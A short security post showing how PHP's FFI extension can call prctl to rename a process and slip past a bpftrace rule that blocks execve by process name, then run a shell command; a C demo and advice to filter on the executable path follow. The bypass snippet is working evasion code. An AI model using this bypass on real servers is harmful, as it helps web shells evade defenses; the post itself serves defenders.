@cr0nym posted about using bpftrace to generically stop PHP and other /specific/ processes from calling execve, preventing most generic web shells and command-execution exploits:
Generic bpftrace-based RCE/webshell prevention technique for critical Linux network services
Some distros, such as the latest Debian, ship PHP with FFI enabled by default, which means one can simply call prctl to change the name of the forked process and bypass the blacklist. There are other methods, in case prctl is added to the script, left as an exercise to astute readers.
<?php
// Declare the two libc functions the script calls through PHP's FFI extension.
$ffi = FFI::cdef("
    int system(const char *command);
    int prctl(int option, const char *arg2, unsigned long arg3,
              unsigned long arg4, unsigned long arg5);
");
$name = "ABAB";
// prctl option 15 is PR_SET_NAME: it renames the calling process, so a
// blacklist that matches on the process name (comm) no longer sees "php".
$ffi->prctl(15, $name, 0, 0, 0);
$ffi->system('id');
?>
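The snippet above works because the process name (comm) is under the process's own control, while the path of the executable it is running is not. The following C program is an added illustration, not code from the original post: it issues the same prctl(PR_SET_NAME) call and compares /proc/self/comm and /proc/self/exe before and after, so a defender can see which identifier a bpftrace filter should key on. It assumes a Linux host with /proc mounted.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>

/* Read /proc/self/comm into buf with the trailing newline stripped. 0 on success. */
static int read_comm(char *buf, size_t len) {
    FILE *f = fopen("/proc/self/comm", "r");
    if (!f) return -1;
    if (!fgets(buf, (int)len, f)) { fclose(f); return -1; }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}

/* Resolve the /proc/self/exe symlink into buf. 0 on success. */
static int read_exe(char *buf, size_t len) {
    ssize_t n = readlink("/proc/self/exe", buf, len - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return 0;
}

/* Rename the process exactly as the PHP snippet does (PR_SET_NAME == 15) and
 * report what a comm-based versus an exe-based filter would observe.
 * Returns 1 if comm changed to new_name while the exe path stayed the same,
 * 0 if that was not the case, -1 on error. */
int comm_vs_exe_demo(const char *new_name) {
    char comm_before[32], comm_after[32], exe_before[4096], exe_after[4096];
    if (read_comm(comm_before, sizeof comm_before) || read_exe(exe_before, sizeof exe_before))
        return -1;
    if (prctl(PR_SET_NAME, new_name, 0, 0, 0) != 0)
        return -1;
    if (read_comm(comm_after, sizeof comm_after) || read_exe(exe_after, sizeof exe_after))
        return -1;
    printf("comm: %s -> %s\n", comm_before, comm_after);  /* attacker-controlled */
    printf("exe:  %s -> %s\n", exe_before, exe_after);    /* unchanged by prctl */
    return strcmp(comm_after, new_name) == 0
        && strcmp(comm_before, comm_after) != 0
        && strcmp(exe_before, exe_after) == 0;
}

int main(void) {
    /* "ABAB" is the constructed name used in the PHP snippet above. */
    return comm_vs_exe_demo("ABAB") == 1 ? 0 : 1;
}
```

The takeaway for the bpftrace script is to match on the executable path (or the parent's) rather than on comm, and to disable FFI in php.ini where it is not needed.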